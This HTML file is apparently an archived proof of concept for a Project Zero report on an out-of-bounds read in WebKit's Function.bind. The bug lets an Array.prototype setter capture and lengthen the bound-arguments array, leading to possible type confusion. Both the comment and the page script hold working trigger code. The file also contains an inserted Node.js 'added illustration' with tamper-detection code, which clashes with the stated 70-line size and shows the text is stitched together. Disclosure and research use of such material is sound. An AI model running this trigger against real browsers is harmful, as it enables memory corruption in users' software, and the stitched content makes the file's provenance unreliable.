70 lines
1.8 KiB
HTML
Executable file
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1033

There is an out-of-bounds read when reading the bound arguments array of a bound function. When Function.bind is called, the arguments to the call are transferred to an Array before they are passed to JSBoundFunction::JSBoundFunction. Since it is possible that the Array prototype has had a setter added to it, it is possible for user script to obtain a reference to this Array, and alter it so that the length is longer than the backing native butterfly array. Then when boundFunctionCall attempts to copy this array to the call parameters, it assumes the length is not longer than the allocated array (which would be true if it wasn't altered), and reads out of bounds.

This is likely exploitable, because the read values are treated as JSValues, so this issue can allow type confusion if the attacker controls any of the unallocated values that are read.

This issue is only in WebKit trunk and Safari preview; it hasn't made it to regular Safari releases yet.
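An added illustration, not part of the Project Zero report or of the PoC that follows: the report says the bound-argument Array becomes reachable from user script because a setter can be planted on Array.prototype. The snippet below (runs under Node.js; every name in it is this example's own) plants such an indexed setter, shows which array construction patterns hand the freshly created array to it and which define own elements directly without consulting the prototype chain, and includes a small check that detects indexed accessors on Array.prototype as a sign of tampering.

```javascript
// Added example: how an indexed setter on Array.prototype observes writes into
// arrays that do not yet own that index, and which construction patterns avoid it.
// All function names here are this example's own, not WebKit's.

// Detect tampering: list every integer-indexed accessor defined on Array.prototype.
function indexedAccessorsOnArrayPrototype() {
  return Object.getOwnPropertyNames(Array.prototype)
    .filter(k => /^(0|[1-9]\d*)$/.test(k))
    .filter(k => {
      const d = Object.getOwnPropertyDescriptor(Array.prototype, k);
      return d && (typeof d.get === "function" || typeof d.set === "function");
    });
}

// Run one array builder while a hostile setter sits on Array.prototype[0] and
// report whether the setter received the new array as its receiver.
function probe(build) {
  let captured = null;
  Object.defineProperty(Array.prototype, "0", {
    configurable: true,
    set(v) { captured = this; }   // captures the receiver, like s() in the PoC
  });
  try {
    const arr = build();
    return { leaked: captured === arr, length: arr.length };
  } finally {
    delete Array.prototype[0];    // restore the untampered prototype
  }
}

// Compare construction patterns under the hostile prototype.
function report() {
  return {
    // a[0] = 1 runs [[Set]]: no own "0" exists, so the prototype setter is
    // invoked with the array as receiver and no element is ever stored.
    indexAssign: probe(() => { const a = []; a[0] = 1; return a; }),
    // Literals, Array.of and Array.from define own elements directly
    // (CreateDataProperty semantics), so the setter never sees them.
    literal:     probe(() => [1]),
    arrayOf:     probe(() => Array.of(1)),
    arrayFrom:   probe(() => Array.from([1])),
  };
}

console.log(JSON.stringify(report(), null, 2));
console.log("accessors left on Array.prototype:", indexedAccessorsOnArrayPrototype());
```

With the setter in place, only the index-assignment builder leaks its array (and ends with length 0, because the setter swallowed the store); the literal, Array.of and Array.from builders end with length 1 and never touch the setter. The defensive takeaway is the same one the report implies: code that fills an array from data it later trusts should define own elements rather than assign through [[Set]], and any integer-indexed accessor found on Array.prototype by the check above should be treated as evidence that the environment has been tampered with.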

A minimal PoC is as follows, and a full PoC is attached.

var ba;

function s(){
    ba = this;
}

function dummy(){
    alert("just a function");
}

Object.defineProperty(Array.prototype, "0", {set : s });

var f = dummy.bind({}, 1, 2, 3, 4);

ba.length = 100000;

f(1, 2, 3);

-->
<html>
<body>
<script>

var ba;

function s(){
    alert("in s");
    ba = this;
}

function g(){
    alert("in g");
    return 7;
}

function dummy(){
    alert("just a function");
}

alert("start");

try{
    Object.defineProperty(Array.prototype, "0", {set : s, get : g});
    var f = dummy.bind({}, 1, 2, 3, 4);
    alert("ba" + ba);
    ba.length = 100000;
    f(1, 2, 3);
}catch(e){
    alert(e.message);
}

</script>
</body>
</html>